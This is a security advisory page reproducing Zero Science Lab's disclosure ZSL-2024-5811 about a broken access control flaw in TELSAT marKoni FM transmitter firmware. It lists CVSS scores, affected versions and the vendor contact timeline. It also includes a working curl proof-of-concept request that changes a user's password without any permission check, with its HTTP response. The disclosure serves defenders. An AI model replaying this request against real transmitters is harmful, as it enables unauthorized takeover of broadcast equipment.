Lucene search

K
zeroscienceGjoko KrsticZSL-2024-5811
HistoryJan 31, 2024 - 12:00 a.m.

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password

2024-01-3100:00:00
Gjoko Krstic
zeroscience.mk
102
telsat markoni fm transmitter
insecure access control
change password
security bypass
cross-site scripting
vendor status
vulnerability discovered
gnu/linux 3.10.53
firmware 1.9.5

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS4

9.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N

AI Score

6.2

Confidence

High

EPSS

0.001

Percentile

39.6%

Title: TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password
Advisory ID: ZSL-2024-5811
Type: Local/Remote
Impact: Security Bypass, Cross-Site Scripting
Risk: (4/5)
Release Date: 31.01.2024

Summary

Professional FM transmitters.

Description

Unauthorized user could exploit this vulnerability to change his/her password, potentially gaining unauthorized access to sensitive information or performing actions beyond her/his designated permissions.

Vendor

TELSAT Srl - <https://www.markoni.it>

Affected Version

Markoni-D (Compact) FM Transmitters
Markoni-DH (Exciter+Amplifiers) FM Transmitters
Markoni-A (Analogue Modulator) FM Transmitters
Firmware: 1.9.5
1.9.3
1.5.9
1.4.6
1.3.9

Tested On

GNU/Linux 3.10.53 (armv7l)
icorem6solox
lighttpd/1.4.33

Vendor Status

[10.11.2023] Vulnerability discovered.
[21.11.2023] Contact with the vendor.
[22.11.2023] No response from the vendor.
[19.01.2024] Contact with the vendor.
[29.01.2024] No response from the vendor.
[31.01.2024] Public security advisory released.

PoC

markoni_eop.txt

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5810.php&gt;
[2] <https://packetstormsecurity.com/files/176936/&gt;
[3] <https://www.exploit-db.com/exploits/51908&gt;
[4] <https://exchange.xforce.ibmcloud.com/vulnerabilities/286367&gt;
[5] <https://www.cisa.gov/news-events/ics-advisories/icsa-24-179-01&gt;
[6] <https://vulners.com/cve/CVE-2024-39376&gt;
[7] <https://nvd.nist.gov/vuln/detail/CVE-2024-39376&gt;

Changelog

[31.01.2024] - Initial release
[01.02.2024] - Added reference [2]
[19.03.2024] - Added reference [3]
[28.03.2024] - Added reference [4]
[01.07.2024] - Added reference [5], [6] and [7]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<html><body><p>TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password


Vendor: TELSAT Srl
Product web page: https://www.markoni.it
Affected version: Markoni-D (Compact) FM Transmitters
                  Markoni-DH (Exciter+Amplifiers) FM Transmitters
                  Markoni-A (Analogue Modulator) FM Transmitters
                  Firmware: 1.9.5
                            1.9.3
                            1.5.9
                            1.4.6
                            1.3.9

Summary: Professional FM transmitters.

Desc: Unauthorized user could exploit this vulnerability to change
his/her password, potentially gaining unauthorized access to sensitive
information or performing actions beyond her/his designated permissions.

Tested on: GNU/Linux 3.10.53 (armv7l)
           icorem6solox
           lighttpd/1.4.33


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2024-5811
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php


10.11.2023

--


PoC request of a user changing his own password.
Only admin can edit users. No permissions or Cookie check.

$ curl -s -H "Cookie: name=user-1702119917" \
http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&amp;username=user&amp;password=user&amp;newpassword=t00tw00t

HTTP/1.1 200 OK
Content-type: text/html
Cache-control: no-cache
Set-Cookie: name=user-1702119917; max-age=315360000
Transfer-Encoding: chunked
Date: Sat, 9 Dec 2023 11:05:17 GMT
Server: lighttpd/1.4.33

oc=4&amp;resp=0
</p></body></html>

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS4

9.3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:N/VI:H/SI:N/VA:H/SA:N

AI Score

6.2

Confidence

High

EPSS

0.001

Percentile

39.6%

Related for ZSL-2024-5811